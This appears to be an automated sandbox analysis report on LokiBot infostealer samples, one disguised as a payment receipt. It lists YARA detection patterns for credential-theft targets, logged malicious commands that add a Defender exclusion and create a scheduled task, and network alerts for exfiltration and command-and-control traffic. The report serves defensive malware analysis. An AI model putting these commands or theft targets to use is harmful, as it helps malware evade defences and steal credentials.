11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
17.2.euKeoTytdT.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
17.2.euKeoTytdT.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
17.2.euKeoTytdT.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.euKeoTytdT.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
17.2.euKeoTytdT.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
17.2.euKeoTytdT.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
17.2.euKeoTytdT.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
17.2.euKeoTytdT.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
17.2.euKeoTytdT.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
17.2.euKeoTytdT.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
17.2.euKeoTytdT.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.euKeoTytdT.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
17.2.euKeoTytdT.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
17.2.euKeoTytdT.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
17.2.euKeoTytdT.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
17.2.euKeoTytdT.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
11.2.euKeoTytdT.exe.40d1e68.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.euKeoTytdT.exe.40d1e68.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.euKeoTytdT.exe.40d1e68.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.euKeoTytdT.exe.40d1e68.5.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
11.2.euKeoTytdT.exe.40d1e68.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 63 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", ParentImage: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ParentProcessId: 5100, ParentProcessName: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", ProcessId: 5668, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp707F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp707F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\euKeoTytdT.exe, ParentImage: C:\Users\user\AppData\Roaming\euKeoTytdT.exe, ParentProcessId: 7252, ParentProcessName: euKeoTytdT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp707F.tmp", ProcessId: 7512, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", ParentImage: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ParentProcessId: 5100, ParentProcessName: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp", ProcessId: 6596, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", ParentImage: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ParentProcessId: 5100, ParentProcessName: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", ProcessId: 5668, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe", ParentImage: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ParentProcessId: 5100, ParentProcessName: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp", ProcessId: 6596, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T15:18:27.024111+0100	2024312	1	A Network Trojan was detected	192.168.2.6	64822	104.21.64.1	80	TCP
2025-03-05T15:18:40.034262+0100	2024312	1	A Network Trojan was detected	192.168.2.6	64823	104.21.64.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T15:18:26.264189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64822	104.21.64.1	80	TCP
2025-03-05T15:18:27.314732+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64823	104.21.64.1	80	TCP
2025-03-05T15:18:40.118443+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64910	104.21.64.1	80	TCP
2025-03-05T15:18:41.063990+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64916	104.21.64.1	80	TCP
2025-03-05T15:18:42.436163+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64922	104.21.64.1	80	TCP
2025-03-05T15:18:43.388337+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64933	104.21.64.1	80	TCP
2025-03-05T15:18:44.340489+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64939	104.21.64.1	80	TCP
2025-03-05T15:18:45.260044+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64944	104.21.64.1	80	TCP
2025-03-05T15:18:46.206902+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64951	104.21.64.1	80	TCP
2025-03-05T15:18:47.104029+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64957	104.21.64.1	80	TCP
2025-03-05T15:18:48.215202+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64967	104.21.64.1	80	TCP
2025-03-05T15:18:49.432056+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64973	104.21.64.1	80	TCP
2025-03-05T15:18:50.380983+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64979	104.21.64.1	80	TCP
2025-03-05T15:18:51.243244+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64984	104.21.64.1	80	TCP
2025-03-05T15:18:52.386057+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64989	104.21.64.1	80	TCP
2025-03-05T15:18:53.312515+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	64998	104.21.64.1	80	TCP
2025-03-05T15:18:54.248332+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65004	104.21.64.1	80	TCP
2025-03-05T15:18:55.193547+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65011	104.21.64.1	80	TCP
2025-03-05T15:18:56.087380+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65017	104.21.64.1	80	TCP
2025-03-05T15:18:56.978426+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65023	104.21.64.1	80	TCP
2025-03-05T15:18:57.913982+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65031	104.21.64.1	80	TCP
2025-03-05T15:18:58.804767+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65039	104.21.64.1	80	TCP
2025-03-05T15:18:59.697261+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65045	104.21.64.1	80	TCP
2025-03-05T15:19:00.623482+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65051	104.21.64.1	80	TCP
2025-03-05T15:19:01.572925+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65057	104.21.64.1	80	TCP
2025-03-05T15:19:02.499088+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65064	104.21.64.1	80	TCP
2025-03-05T15:19:03.433580+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65070	104.21.64.1	80	TCP
2025-03-05T15:19:04.699265+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65075	104.21.64.1	80	TCP
2025-03-05T15:19:05.646597+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65081	104.21.64.1	80	TCP
2025-03-05T15:19:06.599729+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65089	104.21.64.1	80	TCP
2025-03-05T15:19:07.513346+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65095	104.21.64.1	80	TCP
2025-03-05T15:19:08.433697+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65101	104.21.64.1	80	TCP
2025-03-05T15:19:09.387814+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65110	104.21.64.1	80	TCP
2025-03-05T15:19:10.328042+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65116	104.21.64.1	80	TCP
2025-03-05T15:19:11.380150+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65124	104.21.64.1	80	TCP
2025-03-05T15:19:12.326498+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65129	104.21.64.1	80	TCP
2025-03-05T15:19:13.326854+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65130	104.21.64.1	80	TCP
2025-03-05T15:19:14.574778+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65131	104.21.64.1	80	TCP
2025-03-05T15:19:15.531767+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65133	104.21.64.1	80	TCP
2025-03-05T15:19:16.449051+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65134	104.21.64.1	80	TCP
2025-03-05T15:19:17.546931+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65135	104.21.64.1	80	TCP
2025-03-05T15:19:18.432234+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65136	104.21.64.1	80	TCP
2025-03-05T15:19:19.357013+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65137	104.21.64.1	80	TCP
2025-03-05T15:19:20.494450+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65138	104.21.64.1	80	TCP
2025-03-05T15:19:21.406340+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65139	104.21.64.1	80	TCP
2025-03-05T15:19:22.296931+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65140	104.21.64.1	80	TCP
2025-03-05T15:19:23.243325+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65141	104.21.64.1	80	TCP
2025-03-05T15:19:24.153722+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65142	104.21.64.1	80	TCP
2025-03-05T15:19:25.033572+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65143	104.21.64.1	80	TCP
2025-03-05T15:19:25.854341+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65144	104.21.64.1	80	TCP
2025-03-05T15:19:26.739485+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65146	104.21.64.1	80	TCP
2025-03-05T15:19:27.620806+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65147	104.21.64.1	80	TCP
2025-03-05T15:19:28.413430+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65148	104.21.64.1	80	TCP
2025-03-05T15:19:29.357401+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65149	104.21.64.1	80	TCP
2025-03-05T15:19:30.273452+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65150	104.21.64.1	80	TCP
2025-03-05T15:19:31.415543+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65151	104.21.64.1	80	TCP
2025-03-05T15:19:32.328120+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65152	104.21.64.1	80	TCP
2025-03-05T15:19:33.258249+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65153	104.21.64.1	80	TCP
2025-03-05T15:19:34.315136+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65154	104.21.64.1	80	TCP
2025-03-05T15:19:35.182237+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65155	104.21.64.1	80	TCP
2025-03-05T15:19:36.128276+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65156	104.21.64.1	80	TCP
2025-03-05T15:19:37.362091+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65157	104.21.64.1	80	TCP
2025-03-05T15:19:38.289552+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65158	104.21.64.1	80	TCP
2025-03-05T15:19:39.229840+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65159	104.21.64.1	80	TCP
2025-03-05T15:19:40.649571+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65160	104.21.64.1	80	TCP
2025-03-05T15:19:41.600103+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65161	104.21.64.1	80	TCP
2025-03-05T15:19:42.543512+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65162	104.21.64.1	80	TCP
2025-03-05T15:19:43.625562+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65163	104.21.64.1	80	TCP
2025-03-05T15:19:44.544643+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65164	104.21.64.1	80	TCP
2025-03-05T15:19:45.515011+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65165	104.21.64.1	80	TCP
2025-03-05T15:19:46.494953+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65166	104.21.64.1	80	TCP
2025-03-05T15:19:47.447654+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65167	104.21.64.1	80	TCP
2025-03-05T15:19:48.405134+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65168	104.21.64.1	80	TCP
2025-03-05T15:19:49.305755+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65169	104.21.64.1	80	TCP
2025-03-05T15:19:50.455441+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65170	104.21.64.1	80	TCP
2025-03-05T15:19:51.376040+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65172	104.21.64.1	80	TCP
2025-03-05T15:19:52.320862+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65173	104.21.64.1	80	TCP
2025-03-05T15:19:53.657550+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65174	104.21.64.1	80	TCP
2025-03-05T15:19:54.626334+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65175	104.21.64.1	80	TCP
2025-03-05T15:19:55.576929+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65176	104.21.64.1	80	TCP
2025-03-05T15:19:56.606770+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65177	104.21.64.1	80	TCP
2025-03-05T15:19:57.593257+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65178	104.21.64.1	80	TCP
2025-03-05T15:19:58.413260+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65179	104.21.64.1	80	TCP
2025-03-05T15:19:59.411470+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65180	104.21.64.1	80	TCP
2025-03-05T15:20:00.358832+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65181	104.21.64.1	80	TCP
2025-03-05T15:20:01.276615+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65182	104.21.64.1	80	TCP
2025-03-05T15:20:02.872645+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65183	104.21.64.1	80	TCP
2025-03-05T15:20:03.679442+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65184	104.21.64.1	80	TCP
2025-03-05T15:20:04.465396+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65185	104.21.64.1	80	TCP
2025-03-05T15:20:05.388496+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65186	104.21.64.1	80	TCP
2025-03-05T15:20:06.323161+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65187	104.21.64.1	80	TCP
2025-03-05T15:20:07.260302+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65188	104.21.64.1	80	TCP
2025-03-05T15:20:08.182929+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65189	104.21.64.1	80	TCP
2025-03-05T15:20:08.981372+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65190	104.21.64.1	80	TCP
2025-03-05T15:20:09.868718+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65191	104.21.64.1	80	TCP
2025-03-05T15:20:10.856301+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65192	104.21.64.1	80	TCP
2025-03-05T15:20:11.747713+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65193	104.21.64.1	80	TCP
2025-03-05T15:20:12.780744+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65194	104.21.64.1	80	TCP
2025-03-05T15:20:13.589961+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	65195	104.21.64.1	80	TCP
